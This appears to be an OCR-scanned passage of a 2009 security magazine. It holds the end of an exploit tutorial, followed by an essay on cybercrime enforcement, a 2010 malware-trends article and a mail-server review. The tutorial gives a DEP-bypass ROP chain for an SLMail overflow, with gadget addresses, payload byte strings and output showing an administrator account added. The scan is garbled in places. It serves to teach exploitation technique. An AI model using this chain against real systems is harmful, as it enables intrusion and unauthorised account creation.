right? We just have to find where in our 
shellcode we land, put an address to JMP 
ESP and we are all set. Wait a minute. . . 
Look where it placed us (see Figure 14). 

Notice where EIP points to: 

FFFFFFFF. 

That's not an address we can use... 
Let's look at the stack (see Figure 15). 

So close! We are 5 addresses away 
from our user-controlled stack. Due 
to the way ZwSetlnformationProcess 
handles the pushes, pops, and others, 
it leaves remnants on the stack and we 
can't guite get to our shellcode. This was 
frustrating for me, as I probably spent 
2 days getting up to this point finding 
the right calls, only to see myself almost 
to the shellcode, but not close enough. 
About 8 hours later, an inordinate amount 
of Jolt cola, and a loving wife that was 
ceasing to be loving, I came up with an 
idea. I can't control these addresses, but 
can control addresses before it. If I could 
somehow return to a previous value that 
was ignored and have that call place 
me in the right memory space, I might 
be able to get into my stack and get my 
shellcode. Let's take a peek back at my 
original code: 

#0x7C93C899 @SHELL32 PUSH ESP, POP 

EBP, RETN0x4 
disablenx= ' \x99\xC8\x93\x7C ' # 
Get EBP close to our controlled stack 
# POP EBX, RETN 0x7C806B03 @NTDLL 
disablenx+=' \x03\x6B\x80\x7C ' 

# 0x7C8043A3 will be EBX when POP 

Notice the retnox4 in the first call, this 
will return us to the pop ebx, retn in the 
next instruction, but ignore the next 4 
characters. Typically these are filled with 
(for example) \xff\xff\xff\xff, instead 
we're going to put our own address that 
fixes the registers for us. Let's put this all 
together: 

disablenx= ' \x99\xC8\x93\x7C ' # 

Get EBP close to our controlled stack 

disablenx+=' \x03\x6B\x80\x7C ' # 

0x7C8043A3 will be EBX when POP 
disablenx+=' \xFF\xFF\xFF\xFF' # JUNK 
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So the system will go to memory address 
7C93C899, then to 7C036B807C then ignore 
the fffffff and continue on. What if 
it were possible that once we disabled 
DER we could somehow get back to the 
fffffff, which is really an address that 
corrects ESP and pops a couple things off 
of the stack to land us in ourshellcode? 
Here's how we do it. 

Remember when we went here: 

#PUSH ECX, CALL EBX 0x7c934f57 

@SHELL32 
disablenx+= ' \x57\x4F\x93\x7C ' 

# This will go to EBX (0x7c8043A3) 

This would push ECX to the stack, 
call EBX, then pop ESI to the right 
value in a writeable memory address. 
After that it would go straight to our 
ZwSetlnformationProcess function that 
disables DEP for us. Instead of jumping 

tO ZwSetlnformationProcess, We 

go to a RETN, 10, and then go to the 



KtJPPORT_388945a0 

I he comnand completed successfully. 

( ■ :\B en i. ■, and Settings\fidministrator>_ 



ZwSetlnformationProcess. Let's take a 
guick look: 

# RETNOxlO 0x7c8f7495 @SHELL32 
#disablenx+= ' \x95\x74\x8f \x7c ' # 

Stack Alignment 

This will issue a RETN10 
function. We immediately call the 
ZwSetlnformationProcess, it does its 
magic, it checks EBP, then checks ESI, 
then leave, then retnox4. It now places 
us a few instructions behind the origina 
one we had issues with, this is to our \ 
xff\xff\xff\xff. We replace the \xff\ 
xff\xff\xff with a memory address 
of 0x7C85E6F7 in ntdll. This memory 
address looks like this (see Figure 16). 

This will ADD ESP with a value of 
20, POP two registers, then retn4, this 
will land us directly in our controlled 
stack where our shellcode is. One last 
problem, which is easy, we have to find 
exactly where it lands us so we can put 



a memory address for jmp or call 
esp. This is easy with Metasploit; you 
simply go to the tools section, use the 

pattern _ create and pattern _ 

offset tool to find exactly where you 
land. Use that to put in a memory 
address that jmp's esp (see Figure 17). 

Once we jump here, look where we 
land (see Figure 18). 

We land right where we want, to a 
nopslide, and ultimately to ourshellcode. 
modified the shellcode a bit in slmall 
to just add a user account called reiik. 
also found that Oxf f, Oxoo, and 0x0a are 
restricted characters. Let's take a peek 
before and after (see Figure 19). 

Note the user accounts, let's send our 
payload (see Figure 20). 

The payload is sent. Let's recheck our 
user accounts (see Figure 21). 

A local administrator account called 
reiik has been added, simply awesome. 

This is a prime example of taking 
an exploit and using it to bypass data 
execution prevention. I would like to note 
that this isn't a problem with Microsoft 
in anyway; they have chosen to allow 
backwards compatibility (as mentioned 
with Skape and Skywings article). 
Interesting enough is I really haven't 
seen something like this; most of the 
exploits out there with NX bypass already 
have ESI and EBP set up with minor 
modification. This is somewhat different 
as our registers aren't pointing anywhere 
useful. This should be somewhat 
universal if ECX and ESP are writeable 
memory addresses, should take minor 
modification to get it to work with other 
exploits. 

Special thanks to Muts, Ryujin, John 
Melvin (whipsmack), and H.D. Moore that 
have helped along the way. 

Remember to visit http:// 
www.securestate.com for more of this fun 
stuff! 



root@ssdaveUnuxv«l:/home/reUk/Oesktop/rixbypass# python slmail nx bypass. py 
Sending happy NX Bypass Overflow. . . 



Figure 20. Sending payload 



« C:\WINDO WS\system3Z\cmd.eni! 



C:sDocuments and Settings\fldninistrator>net usee 
ili.tr accounts for WSSHACKTH I SBOX-0 



Administrator flSPNET 
IUSR_SSHfiCKIMSBOX-0 I WArLSSHflCKIHISBOX-B 
The command completed successfully.. 



C:\Documents and SettingsNAdninisti"fttQr>nct user 
User accounts for S\SSHf»CKTHISBOX-0 



Guest 

SUPPORT _388945a0 



ft dm inistrator 
IOSR_SSHdCKIHISBOX-0 



BSPNEI 

IWfln_SSHBCKIHISBOX-B 



Figure 21. Checking user account 
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EMERGING THREATS 

We're losing to the bad 
guys. But it'll change, 
and here's how... 



MATTHEW JON KM AN 

Yes I said it. We're losing. And badly. Conservative estimates say that 5-20% of 
commercial computer networks are infected at this moment. I doubt any of us know 
a home user (other than fellow security professionals) that's not been infected before, 
or is as we speak and they're ignoring it because they don't know how to fix it. If a 
company has Windows workstations, one of them's been whacked recently for certain. 




not much we can do about it. Law 
enforcement in most countries are 
overwhelmed and in general not that 
enabled or funded to investigate or 
prosecute in remote countries. Even 
when we do get an extradition and 
conviction the bad guy is looking at 6 
months in a minimum security prison (if 
any time at all), and then a good job at 
an AV company. So the way to stay safe 
is to not attack your fellow citizens, go 
international and you're fine. But even if 
you get caught and prosecuted it'll be 
alright, there's a good job waiting for 
you. 



to protect themselves. This process 
inevitably ends in violence. The kind of 
violence they make History Channel 
specials about. 



if the general public truly understood how 
easy it is for a remote individual or group 
to target them and get their stuff they'd be 
terrified. 



Here's how I think it might go... It 
starts with a political reaction to a major 
breach. A huge breach. Something like 
the US Social Security System losing 
it's entire database, the FBI losing a 
core intelligence database, maybe even 
the NSA losing something big like a list 
of operatives, and very publicly. I know 
they've all lost things now and then, but 
mean a big one, a complete database 
containing information about most 
everyone stolen. The big thing is that the 
bad guys, in the process of monetizing 
this data, are discovered. The world 
becomes suddenly aware of the scope 
of the breach, and realize there's nothing 
they can do about it. 



Even nation versus nation cyber 
capabilities exist and have been 
effectively exercised in recent conflicts. 
National cyber-defense is extremely 
difficult if not impossible against a 
well armed attacker. Many countries 
are building out or have very effective 
offensive capabilities, while most have 
minimal defensive capabilities. 



The only time we see a bad guy 
suffering a conseguence is when 
they cross their peers. Then it can get 
ugly. Many of them disappear, both 
electronically and often physically. Don't 
pay your debts in the underground on 
time, go into hiding. Whack an FBI website 
or retailer's customer database, you're 
fine. 



The major problem is that even the 
most basic cyber attack could cause a 
civilian panic that could cripple a modern 
country. All you need to do is scare your 
enemy civilians a bit and they'll tear each 
other apart fighting over bottled water at 
the supermarket and pull every bit of cash 
out of the bank they can get. The nations 
that haven't built this offensive capability 
can easily hire it out from the underground, 
and what they can hire is far greater than 
most major powers can put together on 
their own! 



believe that at some point the 
world will lash out against the crimina 
underground. Their greed and methods 
are affecting too many people too deeply. 
When a population doesn't feel safe and 
don't believe their government can or 
will protect them they will band together 



There'll be a manhunt. The bad 
guys will be identified as a ring of folks 
from a country the Western world isn't 
not friendly with, and maybe a couple 
Westerners involved as well, (probably 
Americans, we do stupid crap every 
day). The Americans involved will get 
their doors kicked in and and get the 
maximum sentence for their minor 
involvement, which will probably be 



But back to individual and 
organizational vulnerability, there's 
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probation since they have no prior 
offenses and their mothers promise to 
ground them for a year with no TV. 

Laws will be changed to make 
conseguences more dire for cyber crime. 
But the rest of the ring will remain free 
as we're unable to get extradition. These 
guys become local hero's for standing 
up to the big bad modern world and are 
protected. 

Western politicians will grandstand 
for months talking about how we need 
to go get these guys that clogged up 
the tubes of the Internet, or some other 
nonsensical analogy involving Osama 
bin Laden. They'll talk about how this is an 
attack against the fabric of society how 
they're coming after your kids and your 
parents, and the people will rise up. The 
talk shows will be full of "I got my identity 
stolen, I think it was the same guys", or 
"My grandmother's credit card was used 
to buy porn in the Ukraine, it's got to be 
the SSN breach ringleaders." It won't be 
of course, but these guys will end up the 
scapegoats for every cybercrime and 
problem in the world. 

The US will lean heavily on it's allies 
to bring UN action against this country, 
sanctions, maybe even a military action 
if they refuse to extradite. It'll go badly. 
We (the US) will handle the occupation 
badly, tick off all of our allies and potentia 
allies, and set the world back a few steps 
in the process to peace. But that'll pass, 
the world will eventually forgive the US for 
acting rashly and arrogantly, and for that 
'accidental' bomb on a 'random' embassy. 
(Sorry China, promise it won't happen 
again, really!). 

So here's where the solution comes 
in. The world will realize just how lawless 
and uncontrolled the Internet is, and 
just how much they rely on it functioning 
properly and their information remaining 
safe. They'll realize that most of the assets 
they own, their ash, retirement plans, credit 
cards, are just electrons arranged in a 
certain order on a hard drive somewhere. 
And that if those electrons are rearranged 
incorrectly all of their resources are 
suddenly gone. 

The world, finally realizing it's 
vulnerability, will agree to a protocol of 
aw enforcement and abuse control to 



prevent this from happening again. A 
global group will be set up with centra 
authority but enforcement officers 
and investigators within each country. 
These locals will be trained by and 
answer to the central authority, but 
be funded by the local country. Each 
country will also have to contribute to 
the central authority. These funds will 
be raised by taxing Internet access and 
infrastructure. 

So, in order to be 'on' the Internet (i.e. 
have IP space assigned and be peered 
and routed by everyone else) you must 
pay your dues to this group and cooperate 
with their investigations. When a citizen of 
your country is accused of a cyber crime 
they are arrested by local law enforcement 
and prosecuted in a centralized court. 
If convicted the bad guy does their time 
in a prison in ANOTHER country. This will 
eliminate the temptation for a corrupt 
government to give their big money bad 
guys a country club jail sentence. No bad 
guy will be excited about the prospect of 
doing their time in a random third world 
prison. 

Countries that don't cooperate and 
clean up will be unplugged. The effect on 
even a developing economy and society 
will be devastating. The people will rise up 
and demand Internet, the governments 
will either clean up and cooperate or be 
overthrown. 

Big Brother you say? This will result 
in a global police state? Maybe. The 
member states would have to have the 
authority to manage and control this 
authority and amend it's constitution 
in an effective manner. But as long as 
it's funded and enabled/authorized to 
investigate and arrest bad guys we'll have 
a much safer place. Think EU, rotating 
presidents, constituent voting, etc. Just 
without the common currency and work 
visas. 

have an even better idea, lets do 
the central authority for the Internet 
WITHOUT invading a country or losing a 
major database.... Naw. that'll never work. 
Dammit! It's going to take an invasion. Any 
volunteers? 

As always please send me your 
thoughts, jonkman@emergingthreats.net 
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ID fraud expert says... 

A Look at the 
Malware Trends 
Expected in 2010 

JULIAN EVANS 

It's now coming to the end of 2009, so it is now a good time to look at the malware 
from 2009 and look at the trends expected in 2010. This isn't a conclusive article, 
but will highlight the most common threats to PCs and enterprise in 2009 and the 
potential emerging threats to come in 2010. 



Malware defined 

Most readers will know what malware 
is, but you'd be amazed just how many 
people don't! So for the benefit of those 
readers that don't - here is malware 
defined. Malware appears in many 
different forms, but they share one 
common bond - they are unwanted bits 
of code that embed themselves on a PC 
without the user ever knowing (in most 
cases and except for those of us who 
actually check our PCs regularly for any 
malicious code). 

Malware growth trends 

The graph below highlights the unigue 
malware growth trends for 2008 and 
first half of 2009, but actually doesn't 
include all the other malware that 
Averts Labs detected generically or 
heuristically. Add in the generic and 
heuristic detection numbers and one 
can assume the numbers will go 
through the roof. Glance at the graph 
and you cannot fail to notice that 
growth is almost three times what is 
was in 2008. So expect these numbers 
to climb yet further in the latter half of 

2009 and startjumping even higher in 

2010 (see Figure 1). 

There are many types of malware 
- here are the prolific ones as reported 



by leading security vendors in 2009 and 
these will also appear in 2010 - potentially 
developing new, more clever ways to 
combat AV systems and PCs to harness 
user data: 

Adware 

Tracking cookies 
Poisoned searches 
Rootkits 
Keyloggers 
Drive-by downloads 
Trojan horses 



Rogue AV software 
Browser hijackers 
Worms 

Internet diallers 
Piggyback attacks 

Having taken a step back and gasped at 
the different insidious infection methods 
highlighted above, you'd be forgiven to 
think - what do I have to do to protect 
my PC? In fact with a little knowledge you 
can use the internet safely and reduce 
the chances of malware exposure - the 
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Figure 1. Half Year Malware Growth Comparison 
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problem is most individuals and to an 
extent businesses, don't actually know 
how to. The main reason: they don't know 
enough about how malware infects PCs 
and networks. 

Therefore it's not surprising to note 
that the AV security industry is worth 
billions of dollars, but equally it is also 
worth a significant amount to the crimina 
underworld. Not surprising then, that 
malware has become such a widespread 
problem and will continue to do so into 
2010 and beyond. 

Malware is setting the trend 

First, let us look at the malware trends 
that individuals might expect to see 
in 2010. According to the experts and 
the statistics, the PC Malware trends 
chart above is showing that malware is 
growing at an alarming rate and in 2010 
is expected to grow faster than it did in 
2009. 

h the past few weeks (November 
30th 2009) leading US researchers 
have uncovered a way in which to hide 
malware in English language sentences. 

Current security techniques work on 
the assumption that the code used in 
code-injection attacks, where it is delivered 
and run on victims' machines, has a 
different structure to non-executable plain 
data, such as English prose. 

Dr Nicolas T Courtois, an expert in 
security and cryptology at University 
College London, said the work was an 
important paper in virusology, challenging 
an assumption that code has a different 
structure to non-executable plain data. 
He said malware deployed in this way 
would be hard, if not impossible, to detect 
reliably. 

It's worth pointing out that the research 
is currently proof of concept. Additionally 
hackers are unlikely to be currently using 
the English Language to deliver malicious 
payloads, in particular because of the 
amount of engineering work that would be 
required. 

This latest finding will of course 
highlight the weaknesses in current 
anti-virus detection. That said the 
anti-virus industry is adapting (just 
ike the malware writers) and expect 
to see a move to community based 



signature detection (i.e. like Symantec's 
database called Ouorum) as well as 
new and improved behavioural detection 
algorithms to combat existing and future 
malware exploits. 

The research paper, presented at the 
Association of Computing Machinery 
(ACM) Conference on Computer and 
Communications Security in Chicago, in 
November, is called English Shellcode 
- after the hacking community's generic 
name, shellcode, which refers to the 
payload portion of a code-injection 
attack. 

This payload typically provides 
attackers with arbitrary control of system 
resources, applications, and data on 
a vulnerable machine. Attackers then 
choose how they want to continue their 
attack. 

A tool that takes a piece of normal 
shellcode and generates some text 
to hide it could be the next step in 
the hacking and virus arms race. 
The advantage to hackers is simple. 
Alphanumeric shellcode can be stored 
in a typical and otherwise unsuspected 
contexts such as syntactically valid file and 
directory names or user passwords. 

The challenge is that the alphanumeric 
character set is significantly smaller than 
the set of characters available in Unicode 



and UTF-8 encodings. This means that the 
set of instructions available for composing 
alphanumeric shellcode is relatively small. 
You couldn't have long strings of mostly 
capital letters, for example. 

The team trained using English texts, 
roughly comprising 15,000 Wikipedia 
articles, and 27, 000 books from the 
Project Gutenberg. The team can now 
generate English shellcode in less than 
one hour on standard PC hardware with 
4GB of RAM. 

Below is an example of automatically 
generated English encoding. The text in 
bold is the instruction set and the plain text 
is skipped. 

There is a major center of 
economic activity, such as Star Trek, 
including The Ed Sullivan Show. The 
former Soviet Union. International 
organization participation. 

Social malware 

In 2009 we saw the rise of social network 
malware, not for the first time, but certainly 
the largest increase as more and 
more people joined these networks (i.e. 
Facebook and Twitter). The fraudsters are 
tapping into new ways to social engineer 
sensitive personal information through the 
use of malicious third-party applications/ 
widgets, fake profiles, poisoned links and 
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Figure 2. Growth in password-stealing malware 
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spamming, just to name a few techniques 
that are used. 

A really good example of the socia 
malware Is the email message that 
individuals will send with say a funny 
video clip. The unsuspecting users may 
not realize the source and inadvertently 
click the link to a fake video which 
drops a malicious payload onto the PC. 
Hardly social behaviouryou might think! 
The problem is that social malware is 
easy - individuals like to be popular 
i.e. have many friends and as Andy 
Warhol said in Exposures back in 1979 
- In fifteen minutes everybody will be 
famous. 

Andy was very forward thinking, so 
look to today and you will see everyone 
wants to be a celebrity or at least very 
popular (or given the appearance they 
are) - hence the Facebook line of how 
many friends have you got - meaning 
you have more than me. Sadly there is 
also the underworld, where organised 
crime gangs lurk, realising the financia 
perks of using this social revolution to 
exact a social engineering plot to extort 
sensitive individual details on a globa 
scale. Believe it, this is happening and 



at the same time this feature is being 
written. In fact, a lot of people might not 
realise they are a victim until it is too 
ate (see Identity theft section later). Also, 
importantly don't forget these fraudsters 
are clever and will look to manipulate the 
situation whatever and however long it 
takes. 

Most people have heard of Twitter, 
but has anyone heard of the short 
URL threat? Shortened URL's are 
proving extremely popular with micro 
biogging websites such as Twitter. More 
and more people are finding adding 
shortened links (bit.ly) useful as they 
allow you to add more descriptive text 
- but this is also an opportunity for 
fraudsters to exploit shortened URL's. 
These services are a great way (and at 
very low cost) for fraudsters to spread 
malware code. 

Example 

"Leighton Meester sex tape video free 
download" the tweet teasingly offered. 
But beware - as this tweet complete with 
shortened URL had a nasty secret! 

Unfortunate Twitter users who took the 
bait (above example) were in for a treat 
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Figure 3. Various types of identity theft (US) 
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other than revealing clips of Gossip Girl 
vixen. The link led users to a fake porn 
site where online criminals try to install 
a nasty Trojan program on the victim's 
machine. It was yet another one of the 
attacks that victimized tens of thousands 
of Twitterers. 

These assaults have the potential to 
hurt both individual users and companies 
that are increasingly using Twitter to 
promote their business. Shortened URLs 
are shorted (hidden) links that can hide a 
link to a malicious website; you might end 
up with a malicious file on your computer; 
lose personal financial information i.e. 
online bank login details and/or lose your 
personal identity and spend lots of time 
and money recovering your identity. These 
types of social attacks are set to continue 
and develop in 2010. 

Password malware 

Gaming passwords are the most 
targeted logins on the Internet, especially 
as the black market for gaming goods 
and currencies, and the malware to stea 
them, continues to grow. Figure 2 clearly 
shows the growth of gaming malware 
far surpasses that of malware seeking 
banking logins (which are also high on 
fraudsters shopping list), making gamers 
the most targeted group on the Internet. 
Cybercriminals are developing programs 
that steal gaming passwords so that 
they can sell off gamers' virtual goods 
for actual real money - this includes 
everything from custom characters to 
virtual money. 

The most of infectious of password- 
stealing malware are Trojans which 
drop their payload onto a PC after 
an individual has opened an emai 
attachment. The malware code will 
then direct the user to the malicious 
website. Once the malware is installed 
the Trojan will collect usernames and 
passwords from your PC hard drive. 
They do this be targeting software such 
as Internet Explorer, FTP sessions and 
online games such as World of Warcraft. 
Expect cybercriminals to develop new 
cyber self-protection mechanisms, 
something like the rouge anti-virus 
programs (scareware which will be 
discussed in the next section) that 
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disable Trojan removal, disable firewalls, 
stop existing anti-virus from working 
and hijack browser sessions using 
redirectors. 

Rogue anti-malware 
software (scareware) 

2009 saw an unprecedented number of 
rogue antivirus software appearing on the 
Internet. These rogue antivirus programs 
are often referred to as scareware or fake 
security software which makes promises 
to secure or clean up a user's PC, but in 
reality installs a malicious program (for 
example: a Trojan). 

The scareware program produces 
false or misleading results. Worse though 
it demands you pay to remove the 
malicious software. If you attempt to use a 
search engine to find out how to remove 
the malicious program, you might find the 
Trojan has also poisoned your search 
gueries as well. An example of this is when 
you search for an anti-virus orspyware 
removal program you will find the link 
redirects you (called a redirector) to a fake 
website. 

Memory (RAM) attacks 

RAM scrapers have been around for 
years, but very few people have ever heard 
of this type of malware threat, and that 
includes people within the security industry 
too. With industry rules globally reguiring 
credit card data to be encrypted, the threat 
of RAM (computer memory) attacks will 
increase and is becoming a bit of a rage 
among the cyber crime community. It's not 
necessary easy money, but it certainly can 
reap big financial gains. 

RAM scrapers are not new. They 
have in fact been around for years, but 
the recent threat seen by some leading 
security companies, leads industry 
analysts to believe this may well be the 
next real threat in 201 0 and into 201 1 The 
credit card industry is going to have to 
encrypt all its data, as the RAM scraper 
threat is going to be a great opportunity 
for fraudsters. 

RAM scrapers are malware 
programs that search RAM (Random 
Access memory) on point-of-sale 
terminals (POS), where PINS and other 
credit card data must be stored in 



the clear so it can be processed. An 
example of a recent attack involved 
malware that logged only the payment 
card data rather than dumping the 
contents of the memory which ensured 
the malware didn't create server 
overload - in effect this hid the malware 
from security software. 

Fraudsters would then harness this 
opportunity by intercepting the information 
and uploading to powerful servers dotted 
around the globe. 

Security specialist would be able to 
identify whether a server was infected 
i.e. sudden changes in disk space, 
looking for the presence of unusua 
scripts, and monitoring changes to the 
system registry and system processes. 
Consumers on the other hand have no 
control over what happens to their data 
and in the event a RAM scraper stole 
credit card details, only the credit card 
company would be held liable, not the 
consumer. 

Poisoned search 

2009 has also seen the rise of 
cybercriminals using the Google's 
AdWords program in order to get 
malicious sites placed at the top of paid 
search results. 



Some search results, listed to the 
right of organic search results in Google, 
contain links purporting to take searchers 
to the subject they are looking for, but 
redirect them to sites that infect their PCs 
instead. 

h addition, the malware on those sites 
has been tweaked to evade detection by 
many antivirus applications, experts said. 

If the link redirects to a site with 
malicious code, the tactic would appear 
to violate Google's own policies regarding 
Adwords, such as not allowing URLs in 
AdWords results to redirect to other URLs. 
Google is attempting to stop this kind of 
malware threat, but it is difficult to police. 
Expect to see an increase in poisoned 
search exploits over the next 12 months. 
It has also been reported that we will also 
see the emerging threat to the security 
of Internet users which combines Google 
search with websites with an un-updated 
software, similar to what happens with 
blogs. The blogs themselves are indexed 
by Google and contribute the material that 
comes up during searches. 

Cybercriminals are starting to use this 
attack vector which compromises existing 
blogs to get indexed by Google. These 
are referred to as rogue blogs and are 
easily updated automatically with titles 
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that intentionally avoid popular websites 
so that they don't get lost in the ocean 
of authentic websites that cover those 
respective topics. The bizarre part of this 
attack vector is that most of the rogue 
blogs only contain pictures. The reason 
for this is that the images are collected 
by images.google.com and turn up if the 
same combination of words found in the 
title of the blog post is entered into the 
search box. 

For the images to appear at the 
top of Google search results, the 
cybercriminals have worked out that 
all you have to do is make sure each 
image contains the alt and title tags 
that match the words in the title. The 
poisoned link is exposed when a user 
clicks on the image when they are taken 
to a malicious website where in some 
cases notification pop ups appear 
alerting the individual that they are 
infected, when in fact they are not. 

The individual may be tempted into 
downloading the rogue software (see 
previous section) which then installs its 
malicious payload. Expect the image 
search threat to develop in 201 0. For those 
interested in finding out how to remove this 
threat, all you need to do is copy-paste the 
link in the search results directly into the 
browser - the trick is the malicious code 
only redirects you if you arrive through the 
Google search. 

Malware and Identity theft 

Identity theft is very much related to 
malware and I'm sure you can see the 
connection. In fact the relationship is 
more of a marriage as malware is the 
engine while identity theft is the offence of 
committing to use the data collected from 
the malware to steal for financial gain. 
Javelin Strategy & Research Center in the 
US completed a study earlier this year 
(2009) and they concluded the following: 

Identity theft is on the rise, affecting 
almost 10 million victims in 2008. 
That's a 22 percent increase from 

2007. 

Victims are spending less money 
to correct the damage from identity 
theft. The mean cost per victim is 
$500, and most victims pay nothing 



due to zero-liability fraud-protection 
programs offered by their financia 
institutions. 

71 percent of fraud happens within 
one week of the theft of a victim's 
personal data 

Low-tech methods for stealing 
personal information are still the most 
popular for identity thieves. Stolen 
wallets and physical documents 
accounted for 43 percent of all identity 
theft, while online methods accounted 
for only 11 percent. 

Here is a useful chart describing the 
various types of identity theft identified by 
the Federal Trade Commission (FTC) (see 
Figure 3). 

The enterprise threat 

For businesses there will also be an 
unwanted threat as well. Here is a 
snapshot of some threats facing security 
administrators and enterprise and mid- 
sized business information security IS 
managers in 2010: 

Malicious websites targeting visitors 
with clever manipulation of IP 
addresses whereby the IP address 
changes every five minutes making 
detection ever increasingly difficult 
Threats from automated repackaging 
malware applications which change 
how malware will be delivered every 
few minutes 

Mobile devices that connect to a 
network which encourage virus and 
malware propagation - for example 
an SMS Worm which sends out an 
SMS without your knowledge or steals 
your company and personal contacts 
PDF and Flash exploits that inject code 
to steal information using a keylogger 
or other malicious trojan/malware. 

Spamming 

There is no mention of spamming in 
this article. Spamming will be with us 
just like all the malware described but 
will evolve overtime. The main reason 
for this is that it is so well known and 
very easy to stop individuals from 
being infected if they scanned each link 
and made sure they used a sandbox. 



Problem is most individuals do not know 
what a sandbox is. A guick glance at 
Figure 4 will provide further evidence 
that spam is not declining. Spam as a 
percent of total email volume also set a 
new record, reaching 92 percent during 
the third guarter of 2009. Compared 
with last year's third guarter, spam is 
up 24 per cent. Expect the December 
bar to increase yet further as spam 
always increases during holiday periods. 
[McAfee Threats Report Third Ouarter 
2009], 

Anti-malware industry and 
final thoughts 

Expect in 2010 to see AV companies 
around the world look to develop, license 
or acguire anti-malware behavioura 
technology. One such company called 
Novashield is leading the way with its 
advanced anti-malware behavioura 
solution. In the enterprise security 
business, vendors are looking into 
blended threat modules which combine a 
signature database, community feedback 
(like Symantec's database called Quorum 

- which makes use of the anonymous 
software usage patterns of Symantec's 
extensive volunteer user community to 
automatically identify entirely new spyware, 
viruses and worms) and behavioura 
detection. 

The biggest problem facing security 
vendors in 2010 and beyond will be their 
ability to keep up with the development 
of the new malware by the cybercrimina 
fraternity. 

No one can categorically say that the 
blended threat module approach will work 
but with behavioural detection and good 
education, the AV companies can go 
some way to protecting more individuals 
and businesses in 2010 and beyond that 
in 2009 and previous years. 

2009 has truly seen the rise of 
malware and in particular email spam 
delivering malicious attachments i.e. PDF 
and image files. As in the Terminator 
film which titled the rise of the machines 

- 2009 has seen the rise of malware. 
2010 will see an ever increasing variety 
of malware attack vectors, some of which 
have been covered in this article and 
others have yet to be found or developed. 
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a wide range of security tools, Axigen Mail Server now incorporates: 




Identity Confirmation 

Challenge / Response anti-spam filtering at your disposal 

■ Upper-level anti-spam protection already embedded in the messaging solution 

» No additional cost, Address Book correlation, completing an outstanding arsenal of anti-spam tools 

■ The most extensive security mix on the market For a spam-proof Inbox. 



To learn how Identity Confirmation works, please visit www.axigen.com/ic 

To compare our vision with your security expectations, go to www.axigen.com/security 



REVIEW 



AXIGEN MAIL 
SERVER 




The time may have come to 
consider a change, or maybe an 
exchange, of the software you're 
running, or considering running, for your 
in-house mail server needs. A field long 
dominated by Microsoft's Exchange 
software has seen the rise over the 
past five years of a very feature rich and 
real alternative in Gecad Technologies' 
AXIGEN mail server. 

Overview 

Many organizations find, particularly as 
they grow in size above 20-30 users, that 
there are significant benefits to bringing 
mail services in house. Several items are 
that are of primary concern in making this 
decision are: 

What are some of the specific benefits 
derived from having the mail servers 
in house? 

■ Total Cost of Ownership (TCO) - What 
are the initial acguisition, installation 
and ongoing costs of having the mai 
services operation in house versus out 
sourced? 
Installation 

Configuration and Maintenance 
- What skills are reguired to initially 
configure the server and do ongoing 
normal operations such as adding 



and deleting users, installing upgrades 
and maintaining security? 

Addressing these items directly highlights 
some of the strengths of the AXIGEN 
mail server as the right choice for many 
organizations, particularly those in size of 
around 40-400 users. (To note this user 
range is chosen somewhat arbitrarily but 
from my experience as an IT consultant 
I'm considering the depth and skill set of 
the IT staff such organizations typically will 
have.) 

Benefits of In-House Mail Server 
Foremost in the consideration is 
recognition of the key role email plays 
into today's business world. Moreover 
many jurisdictions are placing lega 
reguirements on the archiving of an 
organization's email. 

If we accept that email is critical to 
user productivity then it logically follows 
how do we limit distracting content such 
as spam. Recent analyses of email traffic 
on the Internet have indicated that spam 
(UCE - Unsolicited Commercial Email) 
now comprises in the range of 80-90% 
of all daily email traffic. Regardless of the 
actual percentages the fact is spam/ 
UCE and malicious email such as those 
carrying attachments containing viruses 
are a serious issue. An in house solution 



such as the AXIGEN mail server gives a 
much greater degree of control over these 
issues. 

Specifically the server software 
comes with the Clam AV, Spam 
Assassin and Commtouch built-in to the 
distribution. This installed suite gives the 
user an immediate baseline anti-virus 
and anti-spam solution set and other 
well known anti virus solutions are easily 
integrated if desired. 

Another feature often over looked is 
the ability to easily „white list" specific 
email addresses or whole domains 
as needed. White listing of course 
allows email to bypass spam filtering 
thus removing the risk that important 
email(s) from customers or business 
partners aren't accidentally marked and 
deleted as spam. I would note in my 
more than a few years of consulting I've 
sometimes had to repeatedly petition 
an external mail service to handle this 
for a customer and sometimes it just 
never gets done. In a specific instance 
one client had to guit doing business 
with another company because they 
couldn't simply white list her emai 
address and her orders were constantly 
being rejected as spam. I would note the 
amount of business the other company 
lost was not small. 
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AXIGEN MAIL SERVER 



Overview 

Summary 
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A final point in the list of some of the 
key features of an in-house server is 
the ability to easily archive mail for both 
backup purposes and to meet regulatory 
requirements. 

Total Cost of Ownership 

Taking from a recent white paper released 
by Osterman Research „the cost of 
deploying and managing Exchange for a 
100-seat organization is in the range of 
$35-$40 (USD) per seat per month, while 
for a 1 000 seat organization the cost will 
be on the order of $1 2-$1 5 per seat per 
month." 

As the above demonstrates larger 
organizations can benefit from the 
economies of scale in amortizing the fixed 
costs over a larger user base whereas 
the smaller organizations typical of the 
SMB/SME market can't as readily. Given 
the lower cost of acquisition and ease of 
configuration and maintenance (outlined 
below) smaller organizations can realize 
a TCO well under the $35-$40 that 
deploying Exchange would entail. 

Installation 

Installation of the software was done on 
a Windows 2003 server and couldn't 
have been easier. While installation on 
Linux distros was not executed given the 
advancements in the area of package 
installation in the Linux world I suspect the 
results would be similar. 

Configuration and Maintenance 

This is an area where the AXIGEN Mai 
Server software really shines as can 



be seen from the screen capture which 
illustrates the initial administration screen 
when logging in. 

The graphic interface is very 
nicely designed with a logical flow for 
standard administrative needs starting 
with Global Settings for the server and 
then progressing through .Services" 
(POP3, SMTP, IMAP), and .Domains and 
Accounts" where domain, group and user 
management options are found. 

The following listing gives the specifics 
management options available 

Global Settings 
Services 

Domains and Accounts 
Security and Filtering 
Queue 

Status and Monitoring 
■ Logging 

Back-Up and Restore 
Automatic Migration 
Clustering 

Administration Rights 



Jfc-~ Services 



Services Management 
SMTP Receiving 
SMTP Sending 
IMAP 
POP3 
Webmail 




In performing administrative tasks 
each menu option expands with drop 
down options such as shown below for 
configuring mail services. 

Each item in the .Services" 
administration area then opens to a 
full screen of options that are logically 
arranged and easily understood. The 
range of typical needs for services is well 
covered in providing SMTP, POP3 and 
Webmail as can be seen in the .Services" 
sub-menu shown. 

Given the logical layout and excellent 
graphic interface most users with some 
knowledge of email functions and 
protocols should have minimal difficulty in 
getting the server up and running. 

Conclusions and Summary 

As an IT consultant to the SMB/SME 
sector I'm ever aware of the two conflicting 
items smaller businesses face those 
being enterprise level needs with budget 
constraints that require hard choices 
for usually lesser services. In this case 
would say the AXIGEN team has created 
a winning combination of a powerful 
mail service software package giving key 
functionality at a TCO that makes sense 
for even very small organizations. 

